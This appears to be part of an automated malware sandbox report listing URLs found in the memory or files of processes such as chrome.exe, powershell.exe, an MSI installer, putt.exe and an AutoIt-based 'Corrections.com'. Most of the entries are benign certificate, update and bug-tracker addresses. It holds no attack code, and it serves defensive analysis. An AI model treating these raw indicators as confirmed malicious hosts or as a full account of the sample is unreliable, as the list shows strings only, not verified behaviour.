            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: svchost.exe, 0000001E.00000002.3005946928.000001DA290A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F3D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.30.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
            Source: chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10302000.00000004.00000800.00020000.00000000.sdmp, putt.exe, 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe, 00000010.00000000.2080718223.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe.9.dr, lem[1].exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: Colonial.16.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Colonial.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Colonial.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Corrections.com, 0000001A.00000000.2135017638.0000000001015000.00000002.00000001.01000000.0000000D.sdmp, Appeals.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 0000001D.00000003.2531156057.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
            Source: chrome.exe, 0000001D.00000003.2531156057.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
